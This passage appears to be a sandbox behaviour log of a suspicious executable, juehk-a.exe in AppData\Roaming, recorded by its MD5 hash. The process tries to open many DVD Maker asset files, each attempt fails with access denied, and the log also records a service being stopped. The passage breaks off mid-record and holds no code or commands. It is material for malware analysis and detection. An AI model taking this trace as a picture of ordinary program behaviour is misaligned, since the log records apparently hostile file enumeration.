- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91734
- mode: failed
- sequenceNumber: 1957
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIconSubpict.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91738
- mode: failed
- sequenceNumber: 1958
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91742
- mode: failed
- sequenceNumber: 1959
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91747
- mode: failed
- sequenceNumber: 1960
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91751
- mode: failed
- sequenceNumber: 1961
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIcon.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91756
- mode: failed
- sequenceNumber: 1962
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\PreviousMenuButtonIconSubpi.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91760
- mode: failed
- sequenceNumber: 1963
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91764
- mode: failed
- sequenceNumber: 1964
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91770
- mode: failed
- sequenceNumber: 1965
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91777
- mode: failed
- sequenceNumber: 1966
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91784
- mode: failed
- sequenceNumber: 1967
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91790
- mode: failed
- sequenceNumber: 1968
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91798
- mode: failed
- sequenceNumber: 1969
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Page_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91804
- mode: failed
- sequenceNumber: 1970
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91810
- mode: failed
- sequenceNumber: 1971
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91817
- mode: failed
- sequenceNumber: 1972
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_scene.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91826
- mode: failed
- sequenceNumber: 1973
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91868
- mode: failed
- sequenceNumber: 1974
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91874
- mode: failed
- sequenceNumber: 1975
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\whitemenu.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91898
- mode: failed
- sequenceNumber: 1976
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91905
- mode: failed
- sequenceNumber: 1977
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91911
- mode: failed
- sequenceNumber: 1978
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91917
- mode: failed
- sequenceNumber: 1979
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91945
- mode: failed
- sequenceNumber: 1980
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91952
- mode: failed
- sequenceNumber: 1981
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91959
- mode: failed
- sequenceNumber: 1982
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91965
- mode: failed
- sequenceNumber: 1983
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91975
- mode: failed
- sequenceNumber: 1984
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-over-DOT.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91982
- mode: failed
- sequenceNumber: 1985
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-over-select.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91988
- mode: failed
- sequenceNumber: 1986
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 91997
- mode: failed
- sequenceNumber: 1987
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92004
- mode: failed
- sequenceNumber: 1988
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92089
- mode: failed
- sequenceNumber: 1989
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92097
- mode: failed
- sequenceNumber: 1990
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92102
- mode: failed
- sequenceNumber: 1991
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92109
- mode: failed
- sequenceNumber: 1992
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92116
- mode: failed
- sequenceNumber: 1993
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92122
- mode: failed
- sequenceNumber: 1994
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92128
- mode: failed
- sequenceNumber: 1995
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92134
- mode: failed
- sequenceNumber: 1996
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92142
- mode: failed
- sequenceNumber: 1997
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92146
- mode: failed
- sequenceNumber: 1998
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92154
- mode: failed
- sequenceNumber: 1999
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92158
- mode: failed
- sequenceNumber: 2000
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92163
- mode: failed
- sequenceNumber: 2001
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92169
- mode: failed
- sequenceNumber: 2002
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92176
- mode: failed
- sequenceNumber: 2003
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92182
- mode: failed
- sequenceNumber: 2004
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_videoinset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92188
- mode: failed
- sequenceNumber: 2005
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92194
- mode: failed
- sequenceNumber: 2006
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92200
- mode: failed
- sequenceNumber: 2007
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92224
- mode: failed
- sequenceNumber: 2008
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92231
- mode: failed
- sequenceNumber: 2009
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92237
- mode: failed
- sequenceNumber: 2010
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92243
- mode: failed
- sequenceNumber: 2011
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92250
- mode: failed
- sequenceNumber: 2012
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92256
- mode: failed
- sequenceNumber: 2013
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92262
- mode: failed
- sequenceNumber: 2014
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92268
- mode: failed
- sequenceNumber: 2015
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92274
- mode: failed
- sequenceNumber: 2016
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92280
- mode: failed
- sequenceNumber: 2017
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92286
- mode: failed
- sequenceNumber: 2018
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92291
- mode: failed
- sequenceNumber: 2019
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- uac:
- timestamp: 92300
- mode: service
- sequenceNumber: 2020
- value: Multimedia Class Scheduler
- status: stopped
- file:
- timestamp: 92360
- mode: failed
- sequenceNumber: 2021
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92377
- mode: failed
- sequenceNumber: 2022
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576_91n92.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92383
- mode: failed
- sequenceNumber: 2023
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92389
- mode: failed
- sequenceNumber: 2024
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\720x480icongraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92395
- mode: failed
- sequenceNumber: 2025
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92402
- mode: failed
- sequenceNumber: 2026
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 92415
- mode: failed
- sequenceNumber: 2027
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
